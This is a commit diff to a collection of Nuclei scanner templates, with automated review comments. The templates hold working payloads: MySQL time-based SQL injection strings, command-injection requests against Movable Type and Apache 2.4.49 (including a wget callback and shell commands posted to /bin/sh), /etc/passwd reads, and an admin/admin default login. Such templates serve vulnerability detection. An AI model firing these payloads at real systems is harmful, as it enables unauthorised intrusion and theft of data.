20240819
actions-user committed Aug 19, 2024
1 parent ce4c720 commit 8b2291e
Showing 28 changed files with 657 additions and 426 deletions.
2 changes: 1 addition & 1 deletion date.txt
@@ -1 +1 @@
20240818
20240819
6 changes: 5 additions & 1 deletion poc/auth/BlindSQLAuth.yaml
@@ -1,7 +1,7 @@
id: time-based-sqli
info:
name: Time-Based Blind SQL Injection
author: 3rag
author: Coffinxp/lostsec
severity: Critical
description: Detects time-based blind SQL injection vulnerability
http:
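Review bot: `severity: Critical` is the only capitalised severity value in this commit; every other template here writes `severity: critical`, so keep the lowercase convention. The author line also replaces `3rag` with `Coffinxp/lostsec` instead of appending; the other templates in this set credit several people as a comma-separated list (e.g. `author: dhiyaneshDK,hackergautam`), so `author: 3rag,Coffinxp/lostsec` would preserve the original attribution.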
@@ -11,8 +11,12 @@ http:
payloads:
injection:
- "(SELECT(0)FROM(SELECT(SLEEP(7)))a)"
- "'%2b(select*from(select(sleep(7)))a)%2b'"
- "'XOR(SELECT(0)FROM(SELECT(SLEEP(7)))a)XOR'Z"
- "'XOR(if((select now()=sysdate()),sleep(7),0))XOR'Z"
- "X'XOR(if(now()=sysdate(),/**/sleep(7)/**/,0))XOR'X"
- "' AND (SELECT 4800 FROM (SELECT(SLEEP(7)))HoBG)--"
- "X'XOR(if(now()=sysdate(),(sleep((((7))))),0))XOR'X"
- "if(now()=sysdate(),SLEEP(7),0)"
- "'XOR(if(now()=sysdate(),SLEEP(7),0))XOR'Z"
- "'XOR(SELECT CASE WHEN(1234=1234) THEN SLEEP(7) ELSE 0 END)XOR'Z"
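Review bot: most of the added payloads are duplicates of one another. `'XOR(if((select now()=sysdate()),sleep(7),0))XOR'Z`, `X'XOR(if(now()=sysdate(),/**/sleep(7)/**/,0))XOR'X`, `X'XOR(if(now()=sysdate(),(sleep((((7))))),0))XOR'X` and `'XOR(if(now()=sysdate(),SLEEP(7),0))XOR'Z` all evaluate the same `if(now()=sysdate(),sleep(7),0)` expression with cosmetic changes, and each one costs a 7-second round trip per injection point when the target is vulnerable. Keep one representative per technique, or note in the template which filter each variant is meant to bypass. Two more points: `'%2b(select*from(select(sleep(7)))a)%2b'` is already URL-encoded while the other payloads are raw, so encoding is applied inconsistently depending on where the template places them; and every payload depends on MySQL/MariaDB-specific `SLEEP()` and `sysdate()`, so either the name and description should say MySQL, or PostgreSQL (`pg_sleep`) and MSSQL (`WAITFOR DELAY`) equivalents belong in the list.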
61 changes: 14 additions & 47 deletions poc/cve/CVE-2021–20837.yaml
@@ -1,56 +1,23 @@
id: CVE-2021-20837

info:
name: MovableType - Remote Command Injection
author: dhiyaneshDK,hackergautam
name: RCE in MovableType
author: zin_min_phyo
severity: critical
description: MovableType 5002 and earlier (Movable Type Advanced 7 Series), Movable Type Advanced 6.8. 2 and earlier (Movable Type Advanced 6 Series), Movable Type Premium 1.46 and earlier, and Movable Type Premium Advanced 1.46 and earlier allow remote attackers to execute arbitrary OS commands via unspecified vectors.
reference:
- https://nemesis.sh/posts/movable-type-0day/
- https://github.com/ghost-nemesis/cve-2021-20837-poc
- https://twitter.com/cyber_advising/status/1454051725904580608
- https://nvd.nist.gov/vuln/detail/CVE-2021-20837
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2021-20837
cwe-id: CWE-78
tags: cve,cve2021,rce,movable
reference: https://nemesis.sh/posts/movable-type-0day/
tags: MovableType,RCE

requests:
- raw:
- |
POST /cgi-bin/mt/mt-xmlrpc.cgi HTTP/1.1
Host: {{Hostname}}
Content-Type: text/xml
- method: POST
path:
- "{{BaseURL}}/cgi-bin/mt/mt-xmlrpc.cgi"

<?xml version="1.0" encoding="UTF-8"?>
<methodCall>
<methodName>mt.handler_to_coderef</methodName>
<params>
<param>
<value>
<base64>
{{base64("`wget http://{{interactsh-url}}`")}}
</base64>
</value>
</param>
</params>
</methodCall>
body: '<?xml version="1.0"?><methodCall><methodName>mt.handler_to_coderef</methodName><params><param><value><base64>YGNhdCAvZXRjL3Bhc3N3ZGA=</base64></value></param></params></methodCall>'

matchers-condition: and
matchers:
- type: word
part: interactsh_protocol
words:
- "http"

- type: word
words:
- "failed loading package"

- type: status
status:
- 200

# Enhanced by mp on 2022/05/05

matchers:
- type: regex
regex:
- "root:.*:0:0:"
part: body
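Review bot: this rewrite removes the out-of-band confirmation and replaces it with a reflected-output check that the hunk does not justify. The previous version sent `` `wget http://{{interactsh-url}}` `` and matched on `interactsh_protocol` plus the `failed loading package` error string, which proves execution even when nothing is echoed back; the new version sends the fixed base64 `YGNhdCAvZXRjL3Bhc3N3ZGA=` (decodes to `` `cat /etc/passwd` ``) and matches only `root:.*:0:0:` in the body, so it reports nothing whenever command output is not reflected and on any non-Unix host. Keep the interactsh request and matcher, and if the reflected check stays, make it an additional matcher rather than the only one. The hunk also drops the `reference` list, the whole `classification` block (CVSS 9.8, CWE-78) and the `cve,cve2021,rce` tags that `-tags` filtering depends on, and it removes the `Content-Type: text/xml` header while still posting an XML-RPC body. Smaller points: `requests:` is the deprecated key (the BlindSQLAuth template in this same commit uses `http:`), and the file name `CVE-2021–20837.yaml` contains an en dash where `id: CVE-2021-20837` uses a hyphen, so lookups by file name will miss it.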
22 changes: 14 additions & 8 deletions poc/cve/cve-2009-1151.yaml
@@ -1,15 +1,21 @@
id: CVE-2009-1151

info:
name: PhpMyAdmin Scripts/setup.php Deserialization Vulnerability
name: PhpMyAdmin Scripts - Remote Code Execution
author: princechaddha
severity: high
description: Setup script used to create PhpMyAdmin configurations can be fooled by using a crafted POST request to include arbitrary PHP code in the generated configuration file. Combined with the ability to save files on server, this can allow unauthenticated users to execute arbitrary PHP code.
severity: critical
description: PhpMyAdmin Scripts 2.11.x before 2.11.9.5 and 3.x before 3.1.3.1 are susceptible to a remote code execution in setup.php that allows remote attackers to inject arbitrary PHP code into a configuration file via the save action. Combined with the ability to save files on server, this can allow unauthenticated users to execute arbitrary PHP code.
reference:
- https://www.phpmyadmin.net/security/PMASA-2009-3/
- https://github.com/vulhub/vulhub/tree/master/phpmyadmin/WooYun-2016-199433


- http://phpmyadmin.svn.sourceforge.net/viewvc/phpmyadmin/branches/MAINT_2_11_9/phpMyAdmin/scripts/setup.php?r1=11514&r2=12301&pathrev=12301
- http://www.phpmyadmin.net/home_page/security/PMASA-2009-3.php
- https://nvd.nist.gov/vuln/detail/CVE-2009-1151
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score: 10
cve-id: CVE-2009-1151
cwe-id: CWE-77
tags: cve,cve2009,phpmyadmin,rce,deserialization,kev
requests:
- raw:
- |
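Review bot: the new description ("inject arbitrary PHP code into a configuration file via the save action") no longer matches what the template sends. The request that follows still posts `action=test&configuration=O:10:"PMA_Config":1:{s:6:"source",s:11:"/etc/passwd";}`, a serialized `PMA_Config` object whose `source` is `/etc/passwd`, and the matcher expects that file's contents in the response; the `deserialization` tag kept on the tags line is the accurate label, so keep that wording in the description or the name rather than describing only the save-action variant. The `cvss-metrics` vector (`S:C/C:H/I:H/A:H`) does compute to 10, but the other templates in this commit write scores with one decimal place (`5.3`, `6.5`), so `cvss-score: 10.0` keeps the field consistent.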
@@ -20,13 +26,13 @@ requests:
Content-Type: application/x-www-form-urlencoded
action=test&configuration=O:10:"PMA_Config":1:{s:6:"source",s:11:"/etc/passwd";}
matchers-condition: and
matchers:
- type: status
status:
- 200

- type: regex
regex:
- "root:.*:0:0:"

# Enhanced by mp on 2022/07/06
8 changes: 6 additions & 2 deletions poc/cve/cve-2016-6210.yaml
@@ -1,9 +1,10 @@
id: CVE-2016-6210

info:
name: OpenSSH username enumeration < v7.3
author: iamthefrogy,forgedhallpass
severity: medium
tags: cve,cve2016,network,openssh

description: OpenSSH before 7.3 is vulnerable to username enumeration and DoS vulnerabilities.
reference:
- http://seclists.org/fulldisclosure/2016/Jul/51
@@ -15,15 +16,18 @@ info:
cvss-score: 5.9
cve-id: CVE-2016-6210
cwe-id: CWE-200

network:
- host:
- "{{Hostname}}"
- "{{Host}}:22"

matchers:
- type: regex
regex:
- '(?i)SSH-2.0-OpenSSH_(?:[1-6][^\d][^\r\n]+|7\.[0-2][^\d][\n^\r]+)'

extractors:
- type: regex
regex:
- '(?i)SSH-2.0-OpenSSH_[^\r\n]+'
- '(?i)SSH-2.0-OpenSSH_[^\r\n]+'
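Review bot: the matcher regex `(?i)SSH-2.0-OpenSSH_(?:[1-6][^\d][^\r\n]+|7\.[0-2][^\d][\n^\r]+)` has its second character class inverted. `[\n^\r]` matches only a newline, a literal `^` or a carriage return, not "anything except CR/LF", so a banner such as `SSH-2.0-OpenSSH_7.2p2 Ubuntu` never matches the 7.x branch (after `7.2` and the `p`, the `2` is none of those three characters). It should read `[^\r\n]+`, as the 1-6 branch and the extractor already do. On the host list: `{{Host}}:22` pins the port, so `{{Hostname}}` must stay alongside it for targets supplied on a non-default port; the hunk shows both entries, keep it that way.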
14 changes: 7 additions & 7 deletions poc/cve/cve-2018-15473.yaml
@@ -1,28 +1,28 @@
id: CVE-2018-15473

info:
name: OpenSSH Username Enumeration <= v7.7
author: r3dg33k,daffainfo,forgedhallpass
severity: medium
description: OpenSSH through 7.7 is prone to a user enumeration vulnerability due to not delaying bailout for an invalid authenticating user until after the packet containing the request has been fully parsed, related to auth2-gss.c, auth2-hostbased.c, and auth2-pubkey.c.
reference: https://nvd.nist.gov/vuln/detail/CVE-2018-15473
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2018-15473
- https://github.com/openbsd/src/commit/779974d35b4859c07bc3cb8a12c74b43b0a7d1e0
- https://bugs.debian.org/906236
- http://www.openwall.com/lists/oss-security/2018/08/15/5
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.30
cvss-score: 5.3
cve-id: CVE-2018-15473
cwe-id: CWE-362


tags: network,openssh,cve,cve2018
network:
- host:
- "{{Hostname}}"
- "{{Host}}:22"

matchers:
- type: regex
regex:
- '(?i)SSH-2.0-OpenSSH_(?:[1-6][^\d][^\r]+|7\.[0-7][^\d][^\r]+)'

extractors:
- type: regex
regex:
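Review bot: as with the CVE-2016-6210 template in this commit, `{{Host}}:22` hardcodes the port, so the `{{Hostname}}` entry above it must remain in the host list for targets given as `host:port`; the hunk keeps both, which is correct. The expanded `reference` list and the `cvss-score: 5.3` fix (dropping the trailing zero from `5.30`) are good. Minor: two consecutive blank lines remain between `cwe-id: CWE-362` and `tags:`; the other templates here use at most one.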
Expand Down
11 changes: 5 additions & 6 deletions poc/cve/cve-2018-18778.yaml
@@ -1,18 +1,18 @@
id: CVE-2018-18778

info:
name: mini_httpd Path Traversal
author: dhiyaneshDK
severity: medium
description: ACME mini_httpd before 1.30 lets remote users read arbitrary files.
reference: https://www.acunetix.com/vulnerabilities/web/acme-mini_httpd-arbitrary-file-read/

reference:
- https://www.acunetix.com/vulnerabilities/web/acme-mini_httpd-arbitrary-file-read/
- http://www.acme.com/software/mini_httpd/
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
cvss-score: 6.50
cvss-score: 6.5
cve-id: CVE-2018-18778
cwe-id: CWE-200

tags: cve,cve2018,lfi,mini_httpd
requests:
- raw:
- |+
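Review bot: the added reference `http://www.acme.com/software/mini_httpd/` is the vendor's product page, not an advisory. The other CVE templates touched in this commit list the NVD entry as the canonical reference, so add `https://nvd.nist.gov/vuln/detail/CVE-2018-18778` here as well. `cvss-score: 6.5` now matches the `PR:L` vector above it with the same one-decimal style used for the other score fixes.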
@@ -25,7 +25,6 @@ requests:
- type: status
status:
- 200

- type: regex
regex:
- "root:.*:0:0:"
8 changes: 8 additions & 0 deletions poc/cve/cve-2021-44451.yaml
@@ -1,4 +1,5 @@
id: CVE-2021-44451

info:
name: Apache Superset Default Login
author: dhiyaneshDK
@@ -11,12 +12,14 @@ info:
tags: apache, default-login
classification:
cve-id: CVE-2021-44451

requests:
- raw:
- |
GET /login/ HTTP/1.1
Host: {{Hostname}}
Origin: {{BaseURL}}
- |
POST /login/ HTTP/1.1
Host: {{Hostname}}
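Review bot: `tags: apache, default-login` has a space after the comma and carries no `cve,cve2021` tag, while every other CVE template in this commit uses `cve,cveYYYY,...` with no spaces; since the template has `cve-id: CVE-2021-44451`, `tags: cve,cve2021,apache,superset,default-login` would make it reachable with the same `-tags` filters as the rest. The whitespace-only additions in this hunk are fine.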
@@ -25,12 +28,14 @@ requests:
Referer: {{BaseURL}}/admin/airflow/login
csrf_token={{csrf_token}}&username={{username}}&password={{password}}
attack: pitchfork
payloads:
username:
- admin
password:
- admin

extractors:
- type: regex
name: csrf_token
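Review bot: the `Referer: {{BaseURL}}/admin/airflow/login` header is an Apache Airflow path in an Apache Superset template; the login page this template actually requests is `/login/`, so the Referer should be `{{BaseURL}}/login/`. Also, `attack: pitchfork` with a single `username` and a single `password` value produces exactly one request, so the payload block adds nothing unless more credential pairs are intended; either add them or drop the `attack` line.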
@@ -39,6 +44,7 @@ requests:
internal: true
regex:
- 'value="(.*?)">'

matchers-condition: and
matchers:
- type: word
@@ -48,10 +54,12 @@ requests:
- '<title>Redirecting...</title>'
- '<h1>Redirecting...</h1'
- '<a href="/">'

- type: word
part: header
words:
- 'session'

- type: status
status:
- 302
Expand Down
51 changes: 41 additions & 10 deletions poc/cve/rce-cve-2021-41773.yaml
@@ -1,16 +1,47 @@
id: CVE-2021-41773

info:
name: RCE in Apache HTTP Server 2.4.49
author: RafaelCaria
severity: critical
tags: cve,cve2021,rce
name: Apache 2.4.49 - Path Traversal and Remote Code Execution
author: daffainfo
severity: high
description: A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49. An attacker could use a path traversal attack to map URLs to files outside the expected document root. If files outside of the document root are not protected by "require all denied" these requests can succeed. Additionally this flaw could leak the source of interpreted files like CGI scripts. This issue is known to be exploited in the wild. This issue only affects Apache 2.4.49 and not earlier versions.
reference:
- https://github.com/apache/httpd/commit/e150697086e70c552b2588f369f2d17815cb1782
- https://nvd.nist.gov/vuln/detail/CVE-2021-41773
- https://twitter.com/ptswarm/status/1445376079548624899
- https://twitter.com/h4x0r_dz/status/1445401960371429381
- https://github.com/blasty/CVE-2021-41773

classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.50
cve-id: CVE-2021-41773
cwe-id: CWE-22
metadata:
shodan-query: https://www.shodan.io/search?query=apache+version%3A2.4.49

requests:
- method: POST
path:
- '{{BaseURL}}/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/bash'
body: 'echo;id'
- raw:
- |
GET /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1
Host: {{Hostname}}
- |
POST /cgi-bin/.%2e/%2e%2e/%2e%2e/bin/sh HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
echo Content-Type: text/plain; echo; echo COP-37714-1202-EVC | rev
matchers-condition: or
matchers:

- type: regex
part: body
name: LFI
regex:
- "(uid|gid|groups)=\\d+|bytes from \b(?:[0-9]{1,3}\\.){3}[0-9]{1,3}\b"
- "root:.*:0:0"

- type: word
name: RCE
words:
- "CVE-2021-41773-POC"
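Review bot: the LFI regex `(uid|gid|groups)=\\d+|bytes from \b(?:[0-9]{1,3}\\.){3}[0-9]{1,3}\b` is broken as written. Inside a YAML double-quoted scalar `\b` is the backspace escape (U+0008), not a regex word boundary, so the `bytes from` alternative contains two literal backspace bytes and can never match; write `\\b`, as was already done for `\\d` and `\\.`. The `(uid|gid|groups)=\\d+` alternative is a leftover from the removed `echo;id` body: the new POST body `echo Content-Type: text/plain; echo; echo COP-37714-1202-EVC | rev` never prints `uid=`, so under `matchers-condition: or` that alternative can only fire on unrelated page content. Drop it, or keep `id` as the command. The reversed-marker approach itself is sound: `rev` turns `COP-37714-1202-EVC` into `CVE-2021-41773-POC`, so the `RCE` word matcher cannot be satisfied by a reflection of the request. Three smaller points: the traversal depth differs between the two requests (`.%2e` plus three `%2e%2e` hops to `/etc/passwd`, `.%2e` plus two to `/bin/sh`), which is fine for the default `/usr/local/apache2/cgi-bin` location since `..` at the root is a no-op, but deserves a comment; the RCE request only works with `mod_cgi` enabled, which the description should say; and `cvss-score: 7.50` should be `7.5`, matching the `5.3`/`6.5` fixes elsewhere in this commit. The author line also replaces `RafaelCaria` with `daffainfo` rather than appending.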